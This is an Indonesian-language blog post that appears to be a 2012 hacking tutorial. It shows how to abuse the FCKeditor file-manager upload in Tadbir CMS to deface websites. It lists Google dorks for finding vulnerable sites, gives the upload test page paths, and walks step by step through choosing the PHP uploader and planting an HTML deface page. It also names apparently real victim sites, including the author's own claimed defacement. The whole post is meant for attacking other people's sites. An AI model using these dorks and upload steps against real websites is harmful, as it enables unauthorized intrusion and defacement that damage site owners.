Remote File Upload Exploit Vulnerabil tadbir CMS (fckeditor)

simple tutor/exploit deface CMS upload file dri ane.....

 __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __

| Application Info:

| Name: Tadbir CMS

| Autor:Surabayag3tar

|__ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __

| Vulnerability Info:

| Type: Remote Arbitrary File Upload

| Risk: High

| Dork:coba2 aj...

| inurl:/editor/editor/filemanager/

| (wii tambahin om andre :D)

| inurl:/HTMLEditor/editor/"

| atau

|"inurl:/HTMLEditor/editor//filemanager/"|atau

||"inurl:/HTMLEditor/editor/filemanager/connectors/"

|

|

|

| Exploit:http://target.com/editor/editor/filemanager/upload/test.html

| atau

| http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html

|__ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __ __

dork diatas ^ isi kn d google, cri trget...klo dpt

ex:http://www.dircomext.com/

inject kn exploit ny d atas....

jdinya.......

ex : http://www.tysk.ee/include/editor/editor/filemanager/upload/test.html

pada [Select the "File Uploader" to use: ] <----- pilih PHP

trus upload html kmu.....

klik send it to server, kalo sukses or terapload maka pada kotak [Uploaded File URL:] akan memberikan patch dmn file kmu terupload

ex yg kluar pada kotak [Uploaded File URL:] : /UserFiles/html_kamu.html

maka hasil nya ada di http://target.com/UserFiles/html_kamu.html

mudah kn....hehehehehe

  ex hasil ane : http://www.tysk.ee/failid/Image/takbir.htm

 YG GK PUNYA HTML DEFACE SILAHKAN http://andredejavu.110mb.com/deface.php CTRL+U

silahkan d coba n mdah2an bsa d mengerti...... :D:D

By : Andre Pangestu

Remote File Upload Exploit Vulnerabil tadbir CMS (fckeditor) 2012-08-24T00:10:00+07:00 Rating: 4.5 Diposkan Oleh: Anonymous